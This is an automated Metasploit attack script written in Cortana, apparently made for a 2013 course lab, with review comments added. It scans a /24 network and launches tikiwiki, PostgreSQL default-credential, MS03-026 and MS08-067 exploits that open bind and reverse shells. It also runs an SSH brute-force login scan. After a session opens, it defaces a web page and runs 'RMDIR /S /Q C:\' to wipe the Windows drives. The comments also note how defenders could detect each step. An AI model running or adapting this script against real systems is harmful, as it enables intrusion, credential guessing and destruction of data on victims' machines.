- # Cortana Script - "Time Bomb"
- # For IST 511 2013
- #
- # Created by Patrick O'Connor
- # Add one debug flag while keeping those already set: debug() with no
- # argument is read for the current mask and bit 256 is OR-ed into it.
- # NOTE(review): the meaning of bit 256 is not shown in this file; presumably
- # a Cortana-specific trace flag - confirm against the Cortana documentation.
- debug(debug()| 256);
- on ready {
- # Stage 1 - host discovery, run when the heartbeat_5m event fires.
- # NOTE(review): `when` is presumably Cortana's one-shot listener form (runs
- # on the next matching event only) - confirm.
- when heartbeat_5m {
- #kick off nmap/ping sweep
- # -sn: host discovery only, no port scan; -n: no DNS lookups; -T4: aggressive
- # timing; --min-hostgroup 96: scan at least 96 hosts in parallel. db_nmap
- # records the results in the Metasploit database. The range is hard-coded.
- # On the wire this is one source probing every address of the /24 within a
- # short window.
- cmd_async("db_nmap --min-hostgroup 96 -T4 -n -sn 192.168.100.0/24");
- }
- # Stage 2 - service and OS fingerprinting of the same hard-coded /24, run
- # when the heartbeat_10m event fires.
- when heartbeat_10m {
- #kick off nmap/service detection
- # -A adds OS detection, version detection, script scanning and traceroute;
- # -v is verbose output; -n skips DNS; -T4 and --min-hostgroup 96 as in the
- # ping sweep. Far noisier than the sweep: every live host receives port
- # probes and service banners are requested.
- cmd_async("db_nmap --min-hostgroup 96 -T4 -A -v -n 192.168.100.0/24");
- }
- # Stage 3a - Linux target 192.168.100.202, run when heartbeat_15m fires.
- # A web exploit, an SSH login scan and a PostgreSQL exploit are queued back
- # to back on one console as background jobs (-j); nothing here waits for one
- # to finish before the next is configured.
- when heartbeat_15m {
- # tikiwiki - metasploitable
- println("[*] Begin tikiwiki attack");
- # $console is not declared local, so in Sleep it is a global; the other
- # heartbeat_15m handlers assign the same name.
- $console = console();
- cmd($console, "use exploit/unix/webapp/tikiwiki_graph_formula_exec");
- # Bind payload: the shell listens on the target at LPORT (TCP 9079), so an
- # unexpected listener on that port of the web host is the artefact to look
- # for. NOTE(review): LHOST is set as well, although a bind payload
- # presumably does not use it - confirm.
- cmd_set($console, %(LHOST => "192.168.100.66",
- RPORT => "80",
- LPORT => "9079",
- RHOST => "192.168.100.202",
- PAYLOAD => "generic/shell_bind_tcp",
- TARGET => "0"));
- cmd($console, "exploit -j");
- # Add some lulz to the index.html
- # Registers a session_sync listener from inside the heartbeat handler. No
- # check of session type or host is visible, so it presumably runs for every
- # session that syncs afterwards, not only one opened by the exploit above -
- # confirm.
- on session_sync {
- println("[*] We have a session!");
- # The action is deferred to the next heartbeat_5m; the lambda captures the
- # event's first argument ($1) as $sid.
- when ('heartbeat_5m', lambda({
- # $sid is the session ID when I was declared.
- println("[*] Adding lulz to index.html!");
- # Appends a marker line to the web root's index page through the shell
- # session. File-integrity monitoring on /var/www would flag this write.
- s_cmd($sid, "echo '<h1>lulz</h1><br>' >> /var/www/index.html");
- }, $sid => $1));
- }
- # SSH Brute Force
- println("[*] Begin SSH brute force attack");
- cmd($console, "use auxiliary/scanner/ssh/ssh_login");
- # Only USER_FILE is given, with USER_AS_PASS on and BLANK_PASSWORDS off, so
- # each name in the list is tried with itself as the password; no password
- # list is set. STOP_ON_SUCCESS 0 keeps going after a hit. In sshd logs this
- # appears as a burst of failed logins for many user names from one source.
- cmd_set($console, %(THREADS => "24",
- RPORT => "22",
- VERBOSE => "1",
- USER_AS_PASS => "1",
- STOP_ON_SUCCESS => "0",
- BRUTEFORCE_SPEED => "8",
- USER_FILE => "/opt/metasploit/msf3/data/wordlists/csusb_lab.txt",
- RHOSTS => "192.168.100.202",
- BLANK_PASSWORDS => "0"));
- cmd($console, "run -j");
- # PostgreSQL Payload from SSH Creds
- # NOTE(review): despite the heading, nothing from the SSH scan is passed in;
- # USERNAME/PASSWORD are the literal default pair postgres/postgres. The
- # weakness used is a default database credential reachable on TCP 5432.
- # The reverse payload connects from the target back to 192.168.100.66 on
- # TCP 28430, i.e. an outbound connection from the database host.
- println("[*] Begin PostgreSQL payload attack");
- cmd($console, "use exploit/linux/postgres/postgres_payload");
- cmd_set($console, %(LHOST => "192.168.100.66",
- RPORT => "5432",
- VERBOSE => "0",
- LPORT => "28430",
- RHOST => "192.168.100.202",
- PAYLOAD => "generic/shell_reverse_tcp",
- DATABASE => "template1",
- TARGET => "0",
- USERNAME => "postgres",
- PASSWORD => "postgres"));
- cmd($console, "exploit -j");
- }
- # Stage 3b - Windows target 192.168.100.101 through the MS03-026 RPC DCOM
- # module on TCP 135, run when heartbeat_15m fires.
- # NOTE(review): the heading says Windows 2K3, but the "Windows XP" handler
- # further down uses this same RHOST while the other 2k3 handler uses .102 -
- # confirm which host is meant. The println text also spells the module
- # "ms03_26_dcom" where the module path is ms03_026_dcom.
- when heartbeat_15m {
- # Windows 2K3 DCOM Exploit ms03_026_dcom
- println("[*] Begin Windows 2K3 DCOM ms03_26_dcom attack");
- # $console is an undeclared (global) Sleep variable shared with the other
- # heartbeat_15m handlers.
- $console = console();
- cmd($console, "use exploit/windows/dcerpc/ms03_026_dcom");
- # Bind Meterpreter: the target listens on LPORT (TCP 20271). NOTE(review):
- # LHOST is set although a bind payload presumably does not use it - confirm.
- cmd_set($console, %(RHOST => "192.168.100.101",
- PAYLOAD => "windows/meterpreter/bind_tcp",
- LHOST => "192.168.100.66",
- RPORT => "135",
- LPORT => "20271",
- TARGET => "0"));
- cmd($console, "exploit -j");
- # Lets let the computer cool down a bit before we "clean it"
- # Registers a session_sync listener with no visible check of session type
- # or host, so it presumably runs for every session that syncs afterwards -
- # confirm. The same listener body appears in the two ms08_067 handlers.
- on session_sync {
- println("[*] We have a session!");
- # The action is deferred to the next heartbeat_5m; the lambda captures the
- # event's first argument ($1) as $sid.
- when ('heartbeat_5m', lambda({
- # $sid is the session ID when I was declared.
- println("[*] Perform magic cleanup!");
- # Really useful command to free up some disk space.
- # What it actually does: RMDIR /S /Q removes the whole tree under C:\
- # without prompting - a destructive wipe of the system drive, not cleanup.
- m_exec($sid, "RMDIR /S /Q C:\\ ");
- println("[*] Pens down everyone.");
- # Force-terminates explorer.exe, the desktop shell of the logged-on user.
- m_exec($sid, "taskkill /f /im explorer.exe ");
- }, $sid => $1));
- }
- }
- # Stage 3c - Windows target 192.168.100.102 through the MS08-067 SMB module,
- # run when heartbeat_15m fires. Only RHOST and PAYLOAD are set; the remote
- # port, the bind port and the target selection stay at the module defaults.
- when heartbeat_15m {
- # Windows 2k3 SMB Exploit ms08_067_netapi
- println("[*] Begin Windows 2k3 ms08_67 attack");
- # $console is an undeclared (global) Sleep variable shared with the other
- # heartbeat_15m handlers.
- $console = console();
- cmd($console, "use exploit/windows/smb/ms08_067_netapi");
- cmd_set($console, %(RHOST => "192.168.100.102",
- PAYLOAD => "windows/meterpreter/bind_tcp"));
- cmd($console, "exploit -j");
- # Lets let the computer cool down a bit before we "clean it"
- # Registers a session_sync listener with no visible check of session type
- # or host, so it presumably runs for every session that syncs afterwards -
- # confirm. The same listener body appears in the DCOM and XP handlers.
- on session_sync {
- println("[*] We have a session!");
- # The action is deferred to the next heartbeat_5m; the lambda captures the
- # event's first argument ($1) as $sid.
- when ('heartbeat_5m', lambda({
- # $sid is the session ID when I was declared.
- println("[*] Perform magic cleanup!");
- # Really useful command to free up some disk space.
- # What it actually does: RMDIR /S /Q removes the whole tree under C:\
- # without prompting - a destructive wipe of the system drive, not cleanup.
- m_exec($sid, "RMDIR /S /Q C:\\ ");
- println("[*] Pens down everyone.");
- # Force-terminates explorer.exe, the desktop shell of the logged-on user.
- m_exec($sid, "taskkill /f /im explorer.exe ");
- }, $sid => $1));
- }
- }
- # Stage 3d - Windows target 192.168.100.101 through the MS08-067 SMB module,
- # run when heartbeat_15m fires. Only RHOST and PAYLOAD are set; the remote
- # port, the bind port and the target selection stay at the module defaults.
- # NOTE(review): the DCOM handler above is aimed at this same address, so
- # two exploits are launched at one host on the same heartbeat - confirm
- # that this is intended.
- when heartbeat_15m {
- # Windows XP SMB Exploit ms08_067_netapi
- println("[*] Begin Windows XP ms08_67 attack");
- # $console is an undeclared (global) Sleep variable shared with the other
- # heartbeat_15m handlers.
- $console = console();
- cmd($console, "use exploit/windows/smb/ms08_067_netapi");
- cmd_set($console, %(RHOST => "192.168.100.101",
- PAYLOAD => "windows/meterpreter/bind_tcp"));
- cmd($console, "exploit -j");
- # Lets let the computer cool down a bit before we "clean it"
- # Registers a session_sync listener with no visible check of session type
- # or host, so it presumably runs for every session that syncs afterwards -
- # confirm. The same listener body appears in the DCOM and 2k3 handlers.
- on session_sync {
- println("[*] We have a session!");
- # The action is deferred to the next heartbeat_5m; the lambda captures the
- # event's first argument ($1) as $sid.
- when ('heartbeat_5m', lambda({
- # $sid is the session ID when I was declared.
- println("[*] Perform magic cleanup!");
- # Really useful command to free up some disk space.
- # What it actually does: RMDIR /S /Q removes the whole tree under C:\
- # without prompting - a destructive wipe of the system drive, not cleanup.
- m_exec($sid, "RMDIR /S /Q C:\\ ");
- println("[*] Pens down everyone.");
- # Force-terminates explorer.exe, the desktop shell of the logged-on user.
- m_exec($sid, "taskkill /f /im explorer.exe ");
- }, $sid => $1));
- }
- }
- # Last statement of the `on ready` body: it is reached once the listeners
- # above have been registered, not after they have fired.
- # NOTE(review): what quit() terminates, and whether pending listeners
- # survive it, is not shown in this file - confirm.
- quit();
- }